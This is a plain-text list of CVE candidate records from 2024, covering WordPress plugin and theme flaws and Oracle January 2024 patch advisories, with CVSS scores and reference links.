MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d87134e8-9d73-4a39-b071-37a5dac033b4?source=cve    Assigned (20240301)
CVE    2024    2123    Candidate    The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in all versions up to, and including, 2.8.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L44   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L44   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L53   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L53   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L65   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-grid.php#L65   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L39   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L39   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L53   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-member/trunk/templates/members-list.php#L53   |   MISC:https://plugins.trac.wordpress.org/changeset/3046611/ultimate-member#file746   |   URL:https://plugins.trac.wordpress.org/changeset/3046611/ultimate-member#file746   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c8bc1653-8fee-468a-bb6d-f24959846ee5?source=cve    Assigned (20240301)
CVE    2024    2107    Candidate    The Blossom Spa theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.4 via generated source. This makes it possible for unauthenticated attackers to extract sensitive data including contents of password-protected or scheduled posts.    MISC:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=220138%40blossom-spa&new=220138%40blossom-spa&sfp_email=&sfph_mail=   |   URL:https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=220138%40blossom-spa&new=220138%40blossom-spa&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e54dbf9-a5d1-413d-96ac-93dd499c21a4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/5e54dbf9-a5d1-413d-96ac-93dd499c21a4?source=cve    Assigned (20240301)
CVE    2024    2106    Candidate    The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to Information Exposure in versions up to, and including, 3.2.10. This can allow unauthenticated attackers to extract sensitive data including all registered users' usernames and email addresses which can be used to help perform future attacks.    MISC:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/classes/models/StmUser.php   |   URL:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/classes/models/StmUser.php   |   MISC:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/route.php   |   URL:https://plugins.svn.wordpress.org/masterstudy-lms-learning-management-system/tags/3.2.8/_core/lms/route.php   |   MISC:https://plugins.trac.wordpress.org/changeset/3045511/masterstudy-lms-learning-management-system/tags/3.2.11/_core/lms/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system/trunk/_core/lms/route.php   |   URL:https://plugins.trac.wordpress.org/changeset/3045511/masterstudy-lms-learning-management-system/tags/3.2.11/_core/lms/route.php?old=3036794&old_path=masterstudy-lms-learning-management-system/trunk/_core/lms/route.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/27e4d519-bc98-44d3-a519-72674184e7f2?source=cve    Assigned (20240301)
CVE    2024    20987    Candidate    Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20986    Candidate    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data as well as unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20985    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: UDF). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20984    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server : Security : Firewall). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20983    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.34 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0009/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20982    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20981    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20980    Candidate    Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0 and 7.0.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20979    Candidate    Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Server). Supported versions that are affected are 6.4.0.0.0, 7.0.0.0.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data as well as unauthorized read access to a subset of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20977    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20975    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0007/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20969    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20968    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Options). Supported versions that are affected are 8.0.34 and prior and 8.1.0. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20967    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20964    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20963    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0003/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20960    Candidate    Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: RAPID). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20959    Candidate    Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20958    Candidate    Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: Engineering Change Order). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Installed Base. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Installed Base, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Installed Base accessible data as well as unauthorized read access to a subset of Oracle Installed Base accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20957    Candidate    Vulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Package Build SEC). Supported versions that are affected are Prior to 9.2.8.1. Easily exploitable vulnerability allows high privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20956    Candidate    Vulnerability in the Oracle Agile Product Lifecycle Management for Process product of Oracle Supply Chain (component: Installation). Supported versions that are affected are Prior to 6.2.4.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile Product Lifecycle Management for Process. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Agile Product Lifecycle Management for Process accessible data as well as unauthorized read access to a subset of Oracle Agile Product Lifecycle Management for Process accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Agile Product Lifecycle Management for Process. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20955    Candidate    Vulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20953    Candidate    Vulnerability in the Oracle Agile PLM product of Oracle Supply Chain (component: Export). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Agile PLM. Successful attacks of this vulnerability can result in takeover of Oracle Agile PLM. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20952    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N).    CONFIRM:https://security.netapp.com/advisory/ntap-20240201-0002/   |   MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html   |   MLIST:[debian-lts-announce] 20240131 [SECURITY] [DLA 3728-1] openjdk-11 security update   |   URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00023.html    Assigned (20231207)
CVE    2024    20951    Candidate    Vulnerability in the Oracle Customer Interaction History product of Oracle E-Business Suite (component: Outcome-Result). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Customer Interaction History. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Customer Interaction History, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Customer Interaction History accessible data as well as unauthorized read access to a subset of Oracle Customer Interaction History accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20948    Candidate    Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Setup, Admin). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20947    Candidate    Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Common Applications. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Common Applications, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Common Applications accessible data as well as unauthorized read access to a subset of Oracle Common Applications accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20946    Candidate    Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Solaris. CVSS 3.1 Base Score 5.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20945    Candidate    Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u391, 8u391-perf, 11.0.21, 17.0.9, 21.0.1; Oracle GraalVM for JDK: 17.0.9, 21.0.1; Oracle GraalVM Enterprise Edition: 20.3.12, 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 4.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20944    Candidate    Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle iSupport. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle iSupport, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle iSupport accessible data as well as unauthorized read access to a subset of Oracle iSupport accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20943    Candidate    Vulnerability in the Oracle Knowledge Management product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Knowledge Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Knowledge Management, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge Management accessible data as well as unauthorized read access to a subset of Oracle Knowledge Management accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
CVE    2024    20942    Candidate    Vulnerability in the Oracle Complex Maintenance, Repair, and Overhaul product of Oracle Supply Chain (component: LOV). Supported versions that are affected are 11.5, 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Complex Maintenance, Repair, and Overhaul. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Complex Maintenance, Repair, and Overhaul, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Complex Maintenance, Repair, and Overhaul accessible data as well as unauthorized read access to a subset of Oracle Complex Maintenance, Repair, and Overhaul accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N).    MISC:Oracle Advisory   |   URL:https://www.oracle.com/security-alerts/cpujan2024.html    Assigned (20231207)
